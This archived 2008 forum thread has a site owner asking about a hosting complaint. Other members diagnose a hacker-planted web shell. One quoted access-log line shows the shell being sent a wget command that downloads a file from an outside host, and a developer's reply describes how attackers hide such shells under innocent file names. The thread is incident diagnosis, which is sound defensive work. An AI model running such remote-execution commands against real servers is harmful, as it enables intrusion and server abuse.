The FatBomb Forum is no longer active. Use it for reference only.
For active discussions of Fatbomb, please visit:
The MadBomber Forum

Also see:
FatBomb ReadMe  :-:     :-:
  Newbie Install Guide

Subject: "Hosting issue"   Previous Topic | Next Topic
Printer-friendly copy    
Conferences FatBomb Topic #66
Reading page 1 of 1 pages
kiosk2team
Member since Apr-10-06
Rate this user
Jan-16-08, 09:53 AM (PST)
Click to send private message to kiosk2 Click to view user profileClick to add this user to your buddy list  
"Hosting issue"
 
   Hi

I was contacted by my hosting company who say the site with FatBomb on is running a permanent process.

Upon further investigation this is the problem:

 megatroll.com 69.42.213.68 - - <13/Jan/2008:08:19:06  0000> "POST /fatbomb-data/styles/status.php? HTTP/1.1" 200 21400 "http://megatroll.com/fatbomb-data/styles/status.php?act=cmd&d=/home/sites/megatroll.com/public_html/fatbomb-data/styles/temp/&cmd=wget http://cashandassets.net/source/cb.txt&cmd_txt=1&submit=Execute"; "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"

Has the script been hacked or does this look normal?

The reference to cashandassets.net was not something I have added.

They have disabled scripting on the site until I can explain what the problem is and how it will be fixed.

Thanks

David


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote
Kurtadmin click here to view user rating
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-16-08, 10:01 AM (PST)
Click to EMail Kurt Click to send private message to Kurt Click to view user profileClick to add this user to your buddy list  
1. "RE: Hosting issue"
 
Hi David,

What is this?
http://megatroll.com/fatbomb-data/styles/status.php?

This doesn't make any sense to me at all...It's not FatBomb.

One, Fatty should be installed in the cgi-bin.

Two, Fatty doesn't use a directory structure that includes /fatbomb-data

Three, It doesn't have a "styles" directory.

Four, And, it's not a php script. Fatty is a cgi script. What's this status.php reference?

Your host has given no useful information, just a URL. Instead of a URL they need to provide some type of server error message.


-Boom boom boom boom.


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote
tasarimoderator click here to view user rating
Member since Dec-8-02
1752 posts, 1 feedbacks, 2 points
Jan-16-08, 02:45 PM (PST)
Click to EMail tasari Click to send private message to tasari Click to view user profileClick to add this user to your buddy list  
2. "RE: Hosting issue"
 
   LAST EDITED ON Jan-16-08 AT 02:50 PM (PST)
 
I had that issue many times on my server (different domains => not with Tuelz or Kurt's scripts)

This is a way to overload your hosting account/server !

d=/home/sites/megatroll.com/public_html/fatbomb-data/styles/temp/&cmd=wget http://cashandassets.net/source/cb.txt

This part is the cause... it gets a external file on an other host, but often this is a php file called here as text file. Often it does loop over and over, does load the server.

Some questions...
1) Did you make yourself that directory "fatbomb-data"-directory ?
1a) If yes, where did you get it ? You need to alert them that their is a security issue with their script, at least with status.php
2a) If no, then you have a hacker that got access on your hosting account and created that directory to launch that url which causes the overload. Often hackers get access from A script installed there, but you need to look the php scripts, not kurt's ones, all are cgi or via Tuelz...

Let us know

Tasari


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote
kiosk2team
Member since Apr-10-06
Rate this user
Jan-18-08, 10:17 AM (PST)
Click to send private message to kiosk2 Click to view user profileClick to add this user to your buddy list  
3. "RE: Hosting issue"
 
   Hi

I've had problems replying here.

The script was installed by Kurts support guy/programmer after I purchased it and has remained pretty much as is as I couldn't get my head round the customization.

What do I need to do to resolve it and if it has been hacked, is the script vulnerable?

Thanks again.

David


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote
kiosk2team
Member since Apr-10-06
Rate this user
Jan-18-08, 10:17 AM (PST)
Click to send private message to kiosk2 Click to view user profileClick to add this user to your buddy list  
4. "RE: Hosting issue"
 
   Further to my last post - yes there were some dodgy php files that had been placed inside that folder (which has the templates in I think)

I have deleted them (along with the templates folder - whoops, I have a back up at home though) and have asked the hosting company to re-enable scripting and to check how the site was hacked as there were no other scripts on the site other than Kurts which, as you say, are all cgi scripts.

Thanks for your help.

David

PS - I WILL get round to setting the site to it's true potential one day!!


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote
Kurtadmin click here to view user rating
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-18-08, 10:21 AM (PST)
Click to EMail Kurt Click to send private message to Kurt Click to view user profileClick to add this user to your buddy list  
5. "RE: Hosting issue"
 
Hi David,

Tasari gave good advice above.

I really can't give you any more advice since the problems seem to be associated with a php script and don't have anything to do with Fatty directly.

I wish I could be more help but without moe info there's not a lot we can do on this end.


-Boom boom boom boom.


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote
Kurtadmin click here to view user rating
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-22-08, 10:29 AM (PST)
Click to EMail Kurt Click to send private message to Kurt Click to view user profileClick to add this user to your buddy list  
6. "RE: Hosting issue"
 
This is what Kirill has to say:


"The site was, indeed, hacked, but it does not seem to be related to
FatBomb. The directory 'fatbomb-data/styles' was created by me during installation, it holds images and CSS files that are used by default
fatbomb templates.

The PHP file has nothing to do with FatBomb though; it's a typical
hacker trick. When a hacker gets an ability to upload files to the
server, he usually uploads a script that allows him to run arbitrary
commands remotely. This script usually has some "typical" name, like
"status.php" is this case, and is uploaded to some place deep in the
filesystem tree. In this case, the attacker uploaded the script to
"fatbomb-data/styles" in hope that nobody would notice it for a long
time. I bet if the site owner reviews the other directories of the
site, he will find many other similar scripts with innocent names
allowing remote command execution.

With regard to the script that was used to compromise the site
initially, i highly doubt it was FatBomb. 99% that it was an insecure
WordPress, phpBB2, or some other popular PHP program."


-Boom boom boom boom.


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote
kiosk2team
Member since Apr-10-06
Rate this user
Jan-22-08, 02:46 PM (PST)
Click to send private message to kiosk2 Click to view user profileClick to add this user to your buddy list  
7. "RE: Hosting issue"
 
   Thanks

Fatbomb was/is the only script installed on the site.

It is on a shared hosting server so it could have come via another site on there?

At least we identified the offending stuff and it's working ok now. Just need to upload the styles folder again. Now where did I put it?

Thanks again for your help.

David


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote
Kurtadmin click here to view user rating
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-22-08, 02:49 PM (PST)
Click to EMail Kurt Click to send private message to Kurt Click to view user profileClick to add this user to your buddy list  
8. "RE: Hosting issue"
 
Hi David,

At this point you need to ask your host about how the site was compromised, it is really their job to keep your site safe.

While it's possible Fatty was compromised, it's very unlikely for two reasons: Fatty is pretty secure and it isn't that popular. There just aren't very many people that have access to Fatty.


-Boom boom boom boom.


  Alert | IP Printer-friendly page | Edit | Reply | Reply With Quote


Conferences | Topics | Previous Topic | Next Topic
Rate this topic Rate this topic
Y>